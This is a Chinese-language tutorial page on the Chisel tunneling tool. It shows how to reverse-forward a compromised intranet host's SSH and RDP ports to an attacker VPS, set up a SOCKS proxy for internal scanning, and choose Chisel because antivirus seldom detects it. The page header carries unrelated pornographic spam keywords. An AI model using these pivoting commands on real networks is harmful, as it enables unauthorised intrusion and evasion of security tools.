欧美成人精品手机在线观看_69视频国产_动漫精品第一页_日韩中文字幕网 - 日本欧美一区二区

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

Chisel:內網穿透工具

admin
2024年12月5日 16:31 本文熱度 604

一、chisel工具介紹

Chisel可用來搭建內網隧道,類似于常用的frp和nps之類的工具。由于目前使用的人比較少,因此對于有些殺軟還不能準確的識別出該工具。chisel可以進行端口轉發、反向端口轉發以及Socks流量代理,使用go語言編寫,支持多個平臺使用,是進行內網穿透的一個鮮為人知的好工具。

二、chisel工具下載使用

0x01 chisel工具下載
下載地址:https://github.com/jpillora/chisel/releases/tag/v1.7.4

chisel工具是使用go語言進行編寫的,可以適用于各個平臺,也可以對源碼進行編譯,或者直接使用編譯好的發行版。

0x02 chisel工具使用

首先,chisel和frp、nps是不同的,沒有所謂的服務器端和客戶端,對于chisel,只有一個文件,可以通過執行這個文件,讓其充當服務器端或者客戶端。如下所示:

(1):查看chisel工具的幫助

./chisel -help

(2):查看chisel服務器端的幫助

./chisel server -help

(3):查看chisel客戶端的幫助

./chisel client -help

這塊只是重點講解一下如何查看幫助,接下來會去介紹如何在實戰中使用chisel工具。

三、chisel隧道搭建

0x01 chisel進行ssh內網穿透

首先需要三臺linux主機,在這里使用VPS作為chisel服務器端,然后使用kali作為內網主機,使用另一臺主機作為我們的攻擊者主機。如下圖所示。

(1):第一步:搭建chisel隧道

  • chisel服務端(CentOS上)

./chisel server -p 6666 --reverse

首先,服務器端監聽6666端口,然后使用reverse參數,reverse表示的是服務端使用反向模式,也就是說流量轉到哪個端口由客戶端指定。

  • chisel客戶端(kali的IP為192.168.223.160)

./chisel client -v VPS:6666 R:0.0.0.0:8888:192.168.223.160:22 ./chisel client -v VPS:6666 R:8888:192.168.223.160:22

客戶端啟動成功。

說明:可以使用第一條命令,也可以使用第二條命令,其實第二條命令和第一條命令效果一樣,只是省略了0.0.0.0,chisel的客戶端默認使用的就是0.0.0.0這個IP。

(2):第二步:將kali的22端口轉發到VPS的8888端口上

其實上一步已經完成了這一步操作,現在看一下chisel服務端和客戶端的連接情況。

  • 服務器端

  • 客戶端

SSH已經連接。

(3):第三步:使用攻擊者主機連接kali的SSH

ssh -p 8888 root@VPS(chisel服務端IP)

0x02 chisel進行遠程桌面代理

首先需要兩臺windows主機和一臺VPS,在這里使用VPS作為chisel服務器端,然后使用win7作為內網主機,使用win10作為我們的攻擊者主機。如下圖所示。原理和ssh穿透類似。

(1):第一步:搭建chisel隧道

  • chisel服務端(CentOS上)

./chisel server -p 6666 --reverse

  • chisel客戶端(win7的IP為192.168.223.151)

chisel.exe client -v VPS:6666 R:0.0.0.0:33389:192.168.223.151:3389

(2):第二步:將win7的3389端口轉發到VPS的33389端口

其實上一步已經完成了這一步操作,現在看一下chisel服務端和客戶端的連接情況。

  • 服務端

  • 客戶端

(3):第三步:使用攻擊者主機連接win7的3389

成功登錄遠程桌面。

0x03 chisel進行socks代理

Chisel現在支持socks代理,我們先看下需求,比如有兩臺主機,一臺主機是我們的VPS,有一個公網IP,另一臺主機是我們在內網中拿下的一臺主機,我們需要在這臺主機上配置socks代理,然后使用SocksCap等工具進行內網掃描或者內網滲透。如下圖所示。

注意:這個過程看似和之前的兩種方法一樣,但是這里面有一個最主要的問題就是,chisel這個工具提供的socks代理默認是監聽在127.0.0.1的1080端口上的。首先,需要先明確兩個概念,127.0.0.1和0.0.0.0者兩個IP進行監聽的區別是什么?127.0.0.1監聽的是本機上的所有流量,0.0.0.0監聽的是所有的IP(不論是不是本機的IP)的流量。這就導致一個問題,如果我直接在VPS上執行完命令之后,默認監聽127.0.0.1的1080端口,這樣的話,我只能用VPS去訪問內網主機,如果想要在win10上通過SocksCap設置代理訪問內網是行不通的,因為剛才說過,這個127.0.0.1的1080端口只能使用VPS這臺主機訪問內網的win7。因此,如果想要像之前一樣使用SocksCap去代理訪問內網,需要再多做一步,使用ssh的本地轉發功能將127.0.0.1的1080上的socks流量轉發到0.0.0.0的23333端口,這樣我們就可以在外部通過socks流量實現對內網主機的訪問。如果不進行ssh本地轉發,那么就只能在VPS上設置proxychains代理這種方法對內網實現訪問,這顯然非常不方便。

(1):第一步:搭建chisel隧道

  • chisel服務端(CentOS上)

./chisel server -p 6666 --reverse

  • chisel客戶端(win7的IP為192.168.223.151)

chisel.exe client VPS:6666 R:socks

(2):將127.0.0.1的1080的流量轉發到0.0.0.0的23333端口

本地的1080端口已經監聽成功。

在VPS上使用ssh進行本地流量轉發:

ssh -C -f -N -g -L 0.0.0.0:23333:127.0.0.1:1080 root@VPS

成功將127.0.0.1的1080端口上的流量轉發到0.0.0.0的23333端口上,這樣就可以使用socksCap或者直接在瀏覽器中設置代理對內網資源進行訪問。

(3):使用Socks代理訪問內網

  • 使用瀏覽器

成功訪問到內網的通達OA。

  • 使用SocksCap進行內網訪問

代理搭建成功,流量可以正常進入內網。

四、chisel的優劣點

優點:

目前像frp、nps這種常見的工具已經很容易被殺軟識別,上次打內網傳的frp就很快被殺軟識別,因此chisel可以作為一個不太常用的工具進行嘗試,可能會因為目前特征較少,從而繞過殺軟。

缺點:

個人覺得chisel進行socks流量代理的時候,可能會比較麻煩,因為需要進行本地端口轉發,這樣難免會多進行一步,但是我覺得這個也就是一條命令的事情,個人覺得影響不大。


很尷尬,剛剛從GitHub下載到本地,Windows Defender已經提示有病毒,并自動刪除了?:


該文章在 2024/12/5 16:38:57 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved